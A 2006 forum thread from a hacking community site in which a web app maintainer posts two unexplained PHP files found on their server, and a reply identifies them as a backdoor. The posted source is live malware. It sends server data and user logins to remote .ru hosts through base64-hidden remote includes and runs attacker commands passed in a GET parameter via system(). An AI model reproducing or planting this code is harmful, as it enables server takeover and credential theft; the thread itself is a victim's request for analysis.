Donate to us via Paypal!
The measure of a mans life is not how well he dies, but how well he lives.
Friday, April 23, 2021
Navigation
Home
 Find:
 Information:
Learn
Communicate
Submit
Shop
Challenges
 Exploit:
 Programming:
 Think:
 Track:
 Patch:
 Other:
 Need Help?
Other
Members Online
Total Online: 101
Guests Online: 101
Members Online: 0

Registered Members: 135601
Newest Member: mathewhogg
Latest Articles

View Thread

HellBound Hackers | Computer General | Hacking in general

Author

Need help decyphering

Your avatar

Posted on 30-08-06 18:15
I just stumbled across a couple of php files on the root of the web app I maintain where I work. Nobody knows how they got up there, but they look very sketchy, here is the source:

Code
<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>

here's the other:

Code
<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
    if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
    else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
    if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
    if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>

Very worried and cannot decipher the code ourselves, although we do get the gist of the severity of "system($_GET["a3kfj39fsj2"])" seems like they're trying to execute commands using get args? I don't know but I would very much appreciate some professional insights.
Author

RE: Need help decyphering

Your avatar

Posted on 30-08-06 19:06
looks abit like a backdoor... the system($_GET["a3kfj39fsj2"]) bit looks like a backdoor to execute commands.

and the aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9 bit decodes to: http://bis.iframe.ru/master.php?r_addr= and i think it sends all the info about your server to that site.

looks very dodgey to me... maybe you should delete it.